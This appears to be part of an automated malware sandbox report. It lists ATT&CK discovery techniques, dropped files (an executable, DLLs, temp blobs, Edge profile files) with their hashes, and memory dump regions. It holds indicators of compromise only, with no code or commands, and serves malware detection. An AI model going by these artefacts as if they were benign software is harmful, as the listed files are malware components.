Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\pprotect\PNDRCMKZFVOG\StrCmp.exe

Filesize
47KB

MD5
916d7425a559aaa77f640710a65f9182

SHA1
23d25052aef9ba71ddeef7cfa86ee43d5ba1ea13

SHA256
118de01fb498e81eab4ade980a621af43b52265a9fcbae5dedc492cdf8889f35

SHA512
d0c260a0347441b4e263da52feb43412df217c207eba594d59c10ee36e47e1a098b82ce633851c16096b22f4a4a6f8282bdd23d149e337439fe63a77ec7343bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e4f80e7950cbd3bb11257d2000cb885e

SHA1
10ac643904d539042d8f7aa4a312b13ec2106035

SHA256
1184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124

SHA512
2b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2dc1a9f2f3f8c3cfe51bb29b078166c5

SHA1
eaf3c3dad3c8dc6f18dc3e055b415da78b704402

SHA256
dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa

SHA512
682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
72f87207bab915baa2148a43414f424c

SHA1
af0164f840e7b26f27c9140fe6439eecc16d84a2

SHA256
71c1c2b1a48e35df531cb21ae31b1da78251e3db1ec9aab9c4aa645eae398a58

SHA512
325e480695cd6191c861ad0c07751417a2b86e733f8f9396eedf25504b02f8a6b161656d4a762ee2d031839fd30d8abfedd2dcbbf2420716919783d5af3e94b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e3e6de064f0675aace399c176533533f

SHA1
0fe188a9cfa75da1c987b421720a3a16e9fbc4d3

SHA256
836503300ea34c9bc025cd15b7dd44b8850fee115452c079641b0fd5be94d250

SHA512
a1a2421f14bd5a35d5ff237fd58a9042a2661dab17b1d342a53c7d066301ad2e0e158ee4ae5c25b4b9c7d44286276b906ff6d34e1c8625580f30e075e70f7e4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f08a2542cbff6e096f120a1ebf224c2b

SHA1
239a8b018a73dd63b257c9a16c266665a0956022

SHA256
8344e842d34c37172b7c35ef8cb76bcb00a91659aceae123fb2276c58a75b686

SHA512
5a9ede5d51a15a743cfcd2da2b65085a94b0eb648696c10d3fa690873a98403ba8188335648fddbbc8e01fd1c985686c764d0c60488fa4608e1a48a710623c15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f8bb52c0dc4b52e2302f7cbcbff125c8

SHA1
49d1c85703f0997e9b159cc136334a2a0858940e

SHA256
95043b041fff8b926479d93fd90d739fb5412d9e2825d32efa3e7d8dc19f049c

SHA512
83d83e5503909bb888b369037434e56009a5093ed1f5b37ef91f6ddca24d82c04f370ad25b99f05e01d63b25a4aebf1352fd6095db057f2aa7f7716c72277030

Download Submit
C:\Users\Admin\AppData\Local\Temp\70c6dd3d

Filesize
1.2MB

MD5
2fc18c57411ce250c6060440afa1ba0c

SHA1
15a8381ac0961e2a28ec10597b89dec255a1b882

SHA256
b2983a48024e7efc3476be77c5e0f96f014ef484c7470659c43e7a9d62a8548e

SHA512
c89e5e8f1859ab6eca2896025ec4f8a512689373dceaf9196b6571df623aa64830f70b1bd39726e157a64fe496871df0e261f65b54d095c1dd3d52ea4a29f337

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vl2xggi.2nx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MCoreLib.dll

Filesize
106KB

MD5
815b07c37c83b13457d37ca8c6a7a561

SHA1
746138b85e5611fd058c008411889a15870083cd

SHA256
153c1b5e96e7bc4c9f858c3cc3bc6cd5e09ef68776d95871ca38824c430654c4

SHA512
8949ab1deae036ae785ad20c634519aa368b4768f0dd65c0dc53f8ea70dd7d707c984277b914de14054eb8a044182ff78205e3a02555e377750bb829760b8c31

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MDb.dll

Filesize
205KB

MD5
be1262b27ff4a4349b337cc95b7746e7

SHA1
a88b9a167baedbaef047b862caecb8206548c2f6

SHA256
ab47f3a52c1c2a7f1855c48e2d085e87345590b1fb78353c7070c3b6600843fd

SHA512
d70a9f1113b2b11ff5df3644b97d13cfe1deee1def13e751eabd8e84858e4ae6eb58d45926a1443cafbb7a261bcb61285b4c316014b43c6c6971f7261e13bb96

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MKernel.dll

Filesize
219KB

MD5
98a71909605b7d088f82d66abc64d4c2

SHA1
1e250127851a331dd914215348ef51fff78442c9

SHA256
46410947d60a8b92869aa2cf27b57a94c710047f168ac3bc23879a8461f8686a

SHA512
efa8e407e3fbfb81da07b584b8bbd2a440074388ae3ff6175abc88614b42b53ca70206e7ada00273457fafac58d7729f1c945a9e79ce793bc48229035194b267

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MSVCP71.dll

Filesize
488KB

MD5
561fa2abb31dfa8fab762145f81667c2

SHA1
c8ccb04eedac821a13fae314a2435192860c72b8

SHA256
df96156f6a548fd6fe5672918de5ae4509d3c810a57bffd2a91de45a3ed5b23b

SHA512
7d960aa8e3cce22d63a6723d7f00c195de7de83b877eca126e339e2d8cc9859e813e05c5c0a5671a75bb717243e9295fd13e5e17d8c6660eb59f5baee63a7c43

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MUICoreLib.dll

Filesize
824KB

MD5
60a5383ba17d8f519cb4356e28873a14

SHA1
6bf70393d957320a921226c7fcdf352a0a67442d

SHA256
80878e4543959b63cbd87e3ebb82f4988cbbdf9da564370aa15410783c5f343f

SHA512
a0e0ef1d821e13977d14a806357128285edc0a26c01dcf9fd99e7c62f8efccdf608b1c0dceb1f3f40e988692eb549e22193d9ce253a1c0c1d8b10c46955bee12

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MUIUtils.dll

Filesize
385KB

MD5
97d6efb8b8e0b0f03701a7bafc398545

SHA1
0fe11e0b7f47fdec9aaa98b83728c125409e9d5b

SHA256
51c8715fac6797b7f962a68903f1f994c2af1088ac31972b5e512dab5ab4fd8e

SHA512
2bf8935ad96f35586be6074e8798fa36ee13a05cef05aa0df120ef6800cc1d941310c672894d2380b87c7491663c137fa5bcade4a732bcc6448ba3bf0badb2d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\MUtils.dll

Filesize
619KB

MD5
6da9a492898b66db78f5c9d3fc7ecc64

SHA1
d264f67d92ccd4cfeaed1510ed0b6ae90d3f7db4

SHA256
50dfc607913a47dd266e27f6533f3f6b8f9fe995582f7662a944149a26b5054c

SHA512
11bc138d16f279d70ece09e3d238ce891bc5015b6d49a750e153c2b9286bf95e285e818ed5e25e7c731cdfff1324cdb74155f68fda0ef8104eb0d554e2b2923e

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\Setup.exe

Filesize
168KB

MD5
aef6452711538d9021f929a2a5f633cf

SHA1
205b7fab75e77d1ff123991489462d39128e03f6

SHA256
e611a1ffbe9e08a2660bc290a581aa0b54637524aaf6040a70e54f97136ce5ac

SHA512
7ad84d4d3bab3f5a3e14f336d8931bf4b876299000081b2a94a3fcf698c56b82514753b483c5b8d7ae84ddd92ee1c4043fa5e7fb7c4f7e9eb52ca8c794e508b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\akpufnu

Filesize
947KB

MD5
73b7689689ee2ebca2af73d49d1be058

SHA1
b78537891a459fa77fc5161ecb7000577340b324

SHA256
97ce4e68d3f2ca3575429aeb800cf0e9b3f5dc510a251bbcfae3a9e17e5a925c

SHA512
91648b56ae777aef942df74a35951d22c384032e47b5e3e4825d529729df508e7760cb4e0ef9b89c5cc2c6dc2fda8696569d1f0ed486badbcc29420fde9438a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\cjgmdgs

Filesize
59KB

MD5
b2ba74d633935b9b1b4899e874dfdaf8

SHA1
5e3da7df924d22321f22a47317696c09b32f16fa

SHA256
ebd3ab1802fcf6c1ae76743584804a78b66d7d90c64021110c65c1e3c17d35bd

SHA512
c369d1a4111967621e1d7ff4e7d089dc625b8b333ca2d7db31249855262874ddb967711790bb598b771a02e57c26a3ad0f1282a3c9a874352f32e1dd0ffa23c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\coolcore49.dll

Filesize
764KB

MD5
4f27d1bacaf09d1919484355b341c868

SHA1
f1be78d484235270a1416c6acb20e2915ae050db

SHA256
12cddd3c62ff777f1738226fe0b4b36c8170e5e1c0c47fb5913f1a780dc5f450

SHA512
328277fe18d2bbc11160d0c239c90e94d2689b8dbefb6fe46febb730fbcc6e18ced429f839d7a81d8e1b42fe4c1cb4afaaa5745353daf271ac21984f5c67aced

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\msvcr71.dll

Filesize
340KB

MD5
86f1895ae8c5e8b17d99ece768a70732

SHA1
d5502a1d00787d68f548ddeebbde1eca5e2b38ca

SHA256
8094af5ee310714caebccaeee7769ffb08048503ba478b879edfef5f1a24fefe

SHA512
3b7ce2b67056b6e005472b73447d2226677a8cadae70428873f7efa5ed11a3b3dbf6b1a42c5b05b1f2b1d8e06ff50dfc6532f043af8452ed87687eefbf1791da

Download Submit
C:\Users\Admin\AppData\Local\Temp\file\xprt6.dll

Filesize
244KB

MD5
5b7962210db65d2fcbb314abf6d002ac

SHA1
5aa4edde65bc2fa024334eabd6c7fafcea71a918

SHA256
25354815700aa31ab9d389d740b800d63347a160b3b319d444f1f58a4d0dd748

SHA512
921e1ee16dbc70f2285bb44d03d5bb803c94fd112f77da9d4939d09c3b54fcc0d3e1fde4c3b96b6e5d3fa531f18a67171289516d4df0b9ea5a5d85bd61f4f187

Download Submit
memory/540-69-0x00000264D1580000-0x00000264D1592000-memory.dmp

Filesize
72KB

Download
memory/540-70-0x00000264B7510000-0x00000264B751A000-memory.dmp

Filesize
40KB

Download
memory/540-67-0x00000264B74D0000-0x00000264B74F2000-memory.dmp

Filesize
136KB

Download
memory/2984-208-0x00007FF8BC670000-0x00007FF8BC865000-memory.dmp

Filesize
2.0MB

Download
memory/2984-218-0x0000000000B20000-0x0000000000B9D000-memory.dmp

Filesize
500KB

Download
memory/5196-205-0x00007FF8BC670000-0x00007FF8BC865000-memory.dmp

Filesize
2.0MB

Download
memory/5196-206-0x0000000074A40000-0x0000000074BBB000-memory.dmp

Filesize
1.5MB

Download
memory/5744-160-0x00000000021B0000-0x0000000002213000-memory.dmp

Filesize
396KB

Download
memory/5744-167-0x0000000074A40000-0x0000000074BBB000-memory.dmp

Filesize
1.5MB

Download
memory/5744-168-0x00007FF8BC670000-0x00007FF8BC865000-memory.dmp

Filesize
2.0MB

Download
memory/5744-182-0x0000000074A40000-0x0000000074BBB000-memory.dmp

Filesize
1.5MB

Download
memory/5744-163-0x0000000002220000-0x00000000022F1000-memory.dmp

Filesize
836KB

Download
memory/5744-192-0x0000000074A40000-0x0000000074BBB000-memory.dmp

Filesize
1.5MB

Download